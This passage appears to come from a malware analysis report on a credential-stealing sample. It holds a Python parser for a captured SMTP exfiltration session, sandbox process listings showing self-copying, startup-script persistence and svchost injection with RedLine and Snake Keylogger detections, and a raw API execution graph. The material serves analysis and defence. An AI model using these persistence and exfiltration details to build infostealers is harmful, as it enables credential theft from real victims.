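        if who == "S":
            if line.startswith(("250-STARTTLS", "250 STARTTLS")):
                s["starttls_offered"] = True
            elif line.startswith("334 "):
                # AUTH LOGIN challenges are base64 "Username:" / "Password:".
                prompt = (_b64_text(line[4:]) or "").rstrip(":").lower()
                expect = prompt if prompt in ("username", "password") else None
            elif line.startswith(("235 ", "535 ")):
                s["auth_ok"] = line.startswith("235 ")
                expect = None
            elif line.startswith("250 OK id="):
                s["queue_ids"].append(line.split("id=", 1)[1])
            continue
        verb, _, arg = line.partition(" ")
        if expect:
            key = "auth_user" if expect == "username" else "auth_password"
            expect = None
            if verb.split(":", 1)[0].upper() not in SMTP_VERBS:
                # Answer to the 334 challenge: a base64 credential, not a command.
                s[key] = _b64_text(line.strip())
                continue
        verb = verb.upper()
        if verb in ("EHLO", "HELO"):
            s["ehlo"] = arg
        elif verb == "STARTTLS":
            s["starttls_used"] = True
        elif verb == "AUTH":
            mech, _, initial = arg.partition(" ")
            s["auth_mechanism"] = mech.upper()
            if mech.upper() == "LOGIN" and initial:
                s["auth_user"] = _b64_text(initial)
            elif mech.upper() == "PLAIN" and initial:
                parts = (_b64_bytes(initial) or b"").split(b"\0")
                if len(parts) == 3:
                    s["auth_user"] = parts[1].decode("utf-8", "replace")
                    s["auth_password"] = parts[2].decode("utf-8", "replace")
        elif verb == "MAIL":
            s["mail_from"] = _addr(arg)
        elif verb == "RCPT":
            s["rcpt_to"].append(_addr(arg))
    # Credentials sent without a prior STARTTLS were readable on the wire.
    s["credentials_in_clear"] = s["auth_mechanism"] is not None and not s["starttls_used"]
    return s


if __name__ == "__main__":
    for key, value in summarize_smtp_session(SAMPLE_SMTP_SESSION).items():
        print(f"{key:20} {value}")
```

The mailbox credentials are the most perishable indicator in this report: the AUTH username is a third-party account, and the 235 reply shows its password was valid at analysis time.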


                                      Target ID:0
                                      Start time:21:34:30
                                      Start date:24/07/2024
                                      Path:C:\Users\user\Desktop\DSD876543456780000.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\DSD876543456780000.exe"
                                      Imagebase:0xbf0000
                                      File size:1'113'600 bytes
                                      MD5 hash:F202040EB9D89916F413E67D59C7FD7F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:21:34:31
                                      Start date:24/07/2024
                                      Path:C:\Users\user\AppData\Local\nonsubmerged\chordates.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\DSD876543456780000.exe"
                                      Imagebase:0xe60000
                                      File size:1'113'600 bytes
                                      MD5 hash:F202040EB9D89916F413E67D59C7FD7F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.2040744990.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 38%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:3
                                      Start time:21:34:33
                                      Start date:24/07/2024
                                      Path:C:\Windows\SysWOW64\svchost.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\DSD876543456780000.exe"
                                      Imagebase:0xbe0000
                                      File size:46'504 bytes
                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000003.00000002.4470368288.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:moderate
                                      Has exited:false

                                      Target ID:4
                                      Start time:21:34:45
                                      Start date:24/07/2024
                                      Path:C:\Windows\System32\wscript.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs"
                                      Imagebase:0x7ff72e610000
                                      File size:170'496 bytes
                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:21:34:46
                                      Start date:24/07/2024
                                      Path:C:\Users\user\AppData\Local\nonsubmerged\chordates.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\nonsubmerged\chordates.exe"
                                      Imagebase:0xe60000
                                      File size:1'113'600 bytes
                                      MD5 hash:F202040EB9D89916F413E67D59C7FD7F
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.2183245336.00000000013E0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                      Reputation:low
                                      Has exited:true

                                      Target ID:6
                                      Start time:21:34:47
                                      Start date:24/07/2024
                                      Path:C:\Windows\SysWOW64\svchost.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\nonsubmerged\chordates.exe"
                                      Imagebase:0xbe0000
                                      File size:46'504 bytes
                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000002.4470352706.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:moderate
                                      Has exited:false


                                        Execution Graph

                                        Execution Coverage:3%
                                        Dynamic/Decrypted Code Coverage:0.4%
                                        Signature Coverage:3%
                                        Total number of Nodes:2000
                                        Total number of Limit Nodes:49
96970->96971 96972 bf7510 53 API calls 96971->96972 96973 c671f0 96972->96973 97418 c5d7bc 96973->97418 96975 c67201 96976 c5d4ce 4 API calls 96975->96976 96977 c6720b 96976->96977 96978 bf7510 53 API calls 96977->96978 96981 c67239 96977->96981 96979 c67229 96978->96979 97472 c62947 96979->97472 96982 bf4f39 68 API calls 96981->96982 96982->96983 96983->96768 98123 bf9c6e 96984->98123 96987 c0fddb 22 API calls 96989 c0f02b 96987->96989 96990 c0fe0b 22 API calls 96989->96990 96992 c0f03c 96990->96992 96991 c4f0a8 97032 c0f0a4 96991->97032 98161 c69caa 39 API calls 96991->98161 96993 bf6246 CloseHandle 96992->96993 96995 c0f047 96993->96995 96994 bfb567 39 API calls 96996 c4f10a 96994->96996 96997 bfa961 22 API calls 96995->96997 96998 c0f0b1 96996->96998 96999 c4f112 96996->96999 97000 c0f04f 96997->97000 97002 c0fa5b 3 API calls 96998->97002 97003 bfb567 39 API calls 96999->97003 97001 bf6246 CloseHandle 97000->97001 97004 c0f056 97001->97004 97008 c0f0b8 97002->97008 97003->97008 97005 bf7510 53 API calls 97004->97005 97006 c0f062 97005->97006 97007 bf6246 CloseHandle 97006->97007 97009 c0f06c 97007->97009 97010 c4f127 97008->97010 97011 c0f0d3 97008->97011 97012 bf5745 5 API calls 97009->97012 97014 c0fe0b 22 API calls 97010->97014 98137 bf6270 97011->98137 97015 c0f07d 97012->97015 97017 c4f12c 97014->97017 97018 c4f0a0 97015->97018 97023 c0f085 97015->97023 97025 c4f140 97017->97025 98162 c0f866 ReadFile SetFilePointerEx 97017->98162 98160 bf6216 CloseHandle messages 97018->98160 97026 bf53de 27 API calls 97023->97026 97024 c0f0ea 97029 c4f144 __fread_nolock 97024->97029 98157 bf62b5 22 API calls 97024->98157 97025->97029 98163 c60e85 22 API calls ___scrt_fastfail 97025->98163 97028 c0f093 97026->97028 98156 bf53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97028->98156 97031 c0f0fe 97033 c0f138 97031->97033 97036 bf6246 CloseHandle 97031->97036 97032->96994 97032->96998 97033->96768 97034 c0f09a 97034->97032 97035 c4f069 97034->97035 98159 c5ccff 
SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 97035->98159 97037 c0f12c 97036->97037 97037->97033 98158 bf6216 CloseHandle messages 97037->98158 97039 c4f080 97039->97032 97042 bf7510 53 API calls 97041->97042 97043 c6f126 97042->97043 98194 bf9e90 97043->98194 97045 c6f136 97046 c6f15b 97045->97046 97047 bfec40 256 API calls 97045->97047 97048 bf9c6e 22 API calls 97046->97048 97049 c6f15f 97046->97049 97047->97046 97048->97049 97049->96768 97051 bf4f4a 97050->97051 97052 bf4f43 97050->97052 97054 bf4f6a FreeLibrary 97051->97054 97055 bf4f59 97051->97055 97053 c1e678 67 API calls 97052->97053 97053->97051 97054->97055 97055->96768 97058 c0fddb 97056->97058 97057 c1ea0c ___std_exception_copy 21 API calls 97057->97058 97058->97057 97059 c0fdfa 97058->97059 97062 c0fdfc 97058->97062 98231 c14ead 7 API calls 2 library calls 97058->98231 97059->96744 97061 c1066d 98233 c132a4 RaiseException 97061->98233 97062->97061 98232 c132a4 RaiseException 97062->98232 97065 c1068a 97065->96744 97066->96767 97067->96729 97069 bf9cc2 _wcslen 97068->97069 97070 c0fe0b 22 API calls 97069->97070 97071 bf9cea __fread_nolock 97070->97071 97072 c0fddb 22 API calls 97071->97072 97073 bf9d00 97072->97073 97073->96743 97074->96733 97075->96742 97076->96752 97077->96752 97078->96731 97079->96768 97080->96768 97081->96768 97082->96762 97083->96768 97084->96809 97085->96810 97086->96808 97087->96813 97088->96835 97089->96835 97090->96831 97091->96831 97092->96834 97093->96831 97095 bf625f 97094->97095 97096 bf6250 97094->97096 97095->97096 97097 bf6264 CloseHandle 97095->97097 97098 bfa961 97096->97098 97097->97096 97099 c0fe0b 22 API calls 97098->97099 97100 bfa976 97099->97100 97101 c0fddb 22 API calls 97100->97101 97102 bfa984 97101->97102 97102->96859 97104 bf7525 97103->97104 97121 bf7522 97103->97121 97105 bf752d 97104->97105 97106 bf755b 97104->97106 97210 c151c6 26 API calls 97105->97210 97107 c350f6 97106->97107 97109 bf756d 97106->97109 97117 c3500f 97106->97117 97213 
c15183 26 API calls 97107->97213 97211 c0fb21 51 API calls 97109->97211 97110 bf753d 97115 c0fddb 22 API calls 97110->97115 97113 c3510e 97113->97113 97118 bf7547 97115->97118 97116 c35088 97212 c0fb21 51 API calls 97116->97212 97117->97116 97120 c0fe0b 22 API calls 97117->97120 97119 bf9cb3 22 API calls 97118->97119 97119->97121 97122 c35058 97120->97122 97121->96867 97123 c0fddb 22 API calls 97122->97123 97124 c3507f 97123->97124 97125 bf9cb3 22 API calls 97124->97125 97125->97116 97127 bf575c CreateFileW 97126->97127 97128 c34035 97126->97128 97129 bf577b 97127->97129 97128->97129 97130 c3403b CreateFileW 97128->97130 97129->96876 97129->96877 97130->97129 97131 c34063 97130->97131 97214 bf54c6 97131->97214 97135 bf53f3 97134->97135 97148 bf53f0 messages 97134->97148 97136 bf54c6 3 API calls 97135->97136 97135->97148 97137 bf5410 97136->97137 97138 bf541d 97137->97138 97139 c33f4b 97137->97139 97141 c0fe0b 22 API calls 97138->97141 97229 c0fa5b 97139->97229 97142 bf5429 97141->97142 97220 bf5722 97142->97220 97147 bf54c6 3 API calls 97147->97148 97148->96883 97150 bfb57f 97149->97150 97151 bfb578 97149->97151 97150->96839 97151->97150 97235 c162d1 39 API calls 97151->97235 97153 bfb5c2 97153->96839 97155 bfa961 22 API calls 97154->97155 97156 bf5275 97155->97156 97157 bfa961 22 API calls 97156->97157 97158 bf527d 97157->97158 97159 bfa961 22 API calls 97158->97159 97160 bf5285 97159->97160 97161 bfa961 22 API calls 97160->97161 97162 bf528d 97161->97162 97163 c33df5 97162->97163 97164 bf52c1 97162->97164 97165 bfa8c7 22 API calls 97163->97165 97166 bf6d25 22 API calls 97164->97166 97167 c33dfe 97165->97167 97168 bf52cf 97166->97168 97256 bfa6c3 97167->97256 97249 bf93b2 97168->97249 97171 bf52d9 97172 bf5304 97171->97172 97173 bf6d25 22 API calls 97171->97173 97174 bf5349 97172->97174 97175 bf5325 97172->97175 97191 c33e20 97172->97191 97177 bf52fa 97173->97177 97236 bf6d25 97174->97236 97175->97174 97253 bf4c6d 97175->97253 97179 bf93b2 22 API calls 
97177->97179 97178 bf535a 97180 bf5370 97178->97180 97185 bfa8c7 22 API calls 97178->97185 97179->97172 97182 bf5384 97180->97182 97188 bfa8c7 22 API calls 97180->97188 97186 bf538f 97182->97186 97189 bfa8c7 22 API calls 97182->97189 97185->97180 97190 bfa8c7 22 API calls 97186->97190 97194 bf539a 97186->97194 97187 bf6d25 22 API calls 97187->97174 97188->97182 97189->97186 97190->97194 97262 bf6b57 97191->97262 97192 bf4c6d 22 API calls 97193 c33ee0 97192->97193 97193->97174 97193->97192 97274 bf49bd 22 API calls __fread_nolock 97193->97274 97194->96858 97197 c34a51 97196->97197 97198 bf6362 97196->97198 97293 bf4a88 22 API calls __fread_nolock 97197->97293 97283 bf6373 97198->97283 97201 bf636e 97201->96864 97201->96866 97202 c34a5b 97203 c34a67 97202->97203 97204 bfa8c7 22 API calls 97202->97204 97204->97203 97205->96882 97206->96886 97207->96889 97208->96884 97209->96884 97210->97110 97211->97110 97212->97107 97213->97113 97215 bf54dd 97214->97215 97216 bf5564 SetFilePointerEx SetFilePointerEx 97215->97216 97217 c33f9c SetFilePointerEx 97215->97217 97218 c33f8b 97215->97218 97219 bf5530 97215->97219 97216->97219 97218->97217 97219->97129 97221 c0fddb 22 API calls 97220->97221 97222 bf5433 97221->97222 97223 bf9a40 97222->97223 97224 bf9abb 97223->97224 97227 bf9a4e 97223->97227 97234 c0e40f SetFilePointerEx 97224->97234 97226 bf543f 97226->97147 97227->97226 97228 bf9a8c ReadFile 97227->97228 97228->97226 97228->97227 97230 bf54c6 3 API calls 97229->97230 97231 c0fa79 97230->97231 97232 bf54c6 3 API calls 97231->97232 97233 c0fa9a 97232->97233 97233->97148 97234->97227 97235->97153 97237 bf6d34 97236->97237 97238 bf6d91 97236->97238 97237->97238 97240 bf6d3f 97237->97240 97239 bf93b2 22 API calls 97238->97239 97246 bf6d62 __fread_nolock 97239->97246 97241 bf6d5a 97240->97241 97242 c34c9d 97240->97242 97275 bf6f34 22 API calls 97241->97275 97243 c0fddb 22 API calls 97242->97243 97245 c34ca7 97243->97245 97247 c0fe0b 22 API calls 97245->97247 97246->97178 97248 
c34cda 97247->97248 97250 bf93c9 __fread_nolock 97249->97250 97251 bf93c0 97249->97251 97250->97171 97251->97250 97276 bfaec9 97251->97276 97254 bfaec9 22 API calls 97253->97254 97255 bf4c78 97254->97255 97255->97174 97255->97187 97257 bfa6dd 97256->97257 97261 bfa6d0 97256->97261 97258 c0fddb 22 API calls 97257->97258 97259 bfa6e7 97258->97259 97260 c0fe0b 22 API calls 97259->97260 97260->97261 97261->97172 97263 c34ba1 97262->97263 97264 bf6b67 _wcslen 97262->97264 97265 bf93b2 22 API calls 97263->97265 97267 bf6b7d 97264->97267 97268 bf6ba2 97264->97268 97266 c34baa 97265->97266 97266->97266 97282 bf6f34 22 API calls 97267->97282 97270 c0fddb 22 API calls 97268->97270 97272 bf6bae 97270->97272 97271 bf6b85 __fread_nolock 97271->97193 97273 c0fe0b 22 API calls 97272->97273 97273->97271 97274->97193 97275->97246 97277 bfaedc 97276->97277 97281 bfaed9 __fread_nolock 97276->97281 97278 c0fddb 22 API calls 97277->97278 97279 bfaee7 97278->97279 97280 c0fe0b 22 API calls 97279->97280 97280->97281 97281->97250 97282->97271 97285 bf6382 97283->97285 97290 bf63b6 __fread_nolock 97283->97290 97284 c34a82 97287 c0fddb 22 API calls 97284->97287 97285->97284 97286 bf63a9 97285->97286 97285->97290 97294 bfa587 97286->97294 97289 c34a91 97287->97289 97291 c0fe0b 22 API calls 97289->97291 97290->97201 97292 c34ac5 __fread_nolock 97291->97292 97293->97202 97295 bfa59d 97294->97295 97298 bfa598 __fread_nolock 97294->97298 97296 c0fe0b 22 API calls 97295->97296 97297 c3f80f 97295->97297 97296->97298 97297->97297 97298->97290 97300 c5dbdc GetFileAttributesW 97299->97300 97301 c5d4d5 97299->97301 97300->97301 97302 c5dbe8 FindFirstFileW 97300->97302 97301->96768 97302->97301 97303 c5dbf9 FindClose 97302->97303 97303->97301 97305 bf7510 53 API calls 97304->97305 97306 c77f90 97305->97306 97329 c77fd5 messages 97306->97329 97342 c78cd3 97306->97342 97308 c78281 97309 c7844f 97308->97309 97313 c7828f 97308->97313 97383 c78ee4 60 API calls 97309->97383 97312 c7845e 97312->97313 97314 
c7846a 97312->97314 97355 c77e86 97313->97355 97314->97329 97315 bf7510 53 API calls 97332 c78049 97315->97332 97320 c782c8 97370 c0fc70 97320->97370 97323 c78302 97377 bf63eb 22 API calls 97323->97377 97324 c782e8 97376 c6359c 82 API calls __wsopen_s 97324->97376 97327 c782f3 GetCurrentProcess TerminateProcess 97327->97323 97328 c78311 97378 bf6a50 22 API calls 97328->97378 97329->96900 97331 c7832a 97340 c78352 97331->97340 97379 c004f0 22 API calls 97331->97379 97332->97308 97332->97315 97332->97329 97374 c5417d 22 API calls __fread_nolock 97332->97374 97375 c7851d 42 API calls 97332->97375 97333 c784c5 97333->97329 97337 c784d9 FreeLibrary 97333->97337 97335 c78341 97380 c78b7b 75 API calls 97335->97380 97337->97329 97340->97333 97381 c004f0 22 API calls 97340->97381 97382 bfaceb 23 API calls messages 97340->97382 97384 c78b7b 75 API calls 97340->97384 97343 bfaec9 22 API calls 97342->97343 97344 c78cee CharLowerBuffW 97343->97344 97385 c58e54 97344->97385 97348 bfa961 22 API calls 97349 c78d2a 97348->97349 97350 bf6d25 22 API calls 97349->97350 97351 c78d3e 97350->97351 97352 bf93b2 22 API calls 97351->97352 97354 c78d48 _wcslen 97352->97354 97353 c78e5e _wcslen 97353->97332 97354->97353 97392 c7851d 42 API calls 97354->97392 97356 c77ea1 97355->97356 97357 c77eec 97355->97357 97358 c0fe0b 22 API calls 97356->97358 97361 c79096 97357->97361 97359 c77ec3 97358->97359 97359->97357 97360 c0fddb 22 API calls 97359->97360 97360->97359 97362 c792ab messages 97361->97362 97369 c790ba _strcat _wcslen 97361->97369 97362->97320 97363 bfb567 39 API calls 97363->97369 97364 bfb38f 39 API calls 97364->97369 97365 bfb6b5 39 API calls 97365->97369 97366 bf7510 53 API calls 97366->97369 97367 c1ea0c 21 API calls ___std_exception_copy 97367->97369 97369->97362 97369->97363 97369->97364 97369->97365 97369->97366 97369->97367 97395 c5efae 24 API calls _wcslen 97369->97395 97371 c0fc85 97370->97371 97372 c0fd1d VirtualAlloc 97371->97372 97373 c0fceb 97371->97373 97372->97373 
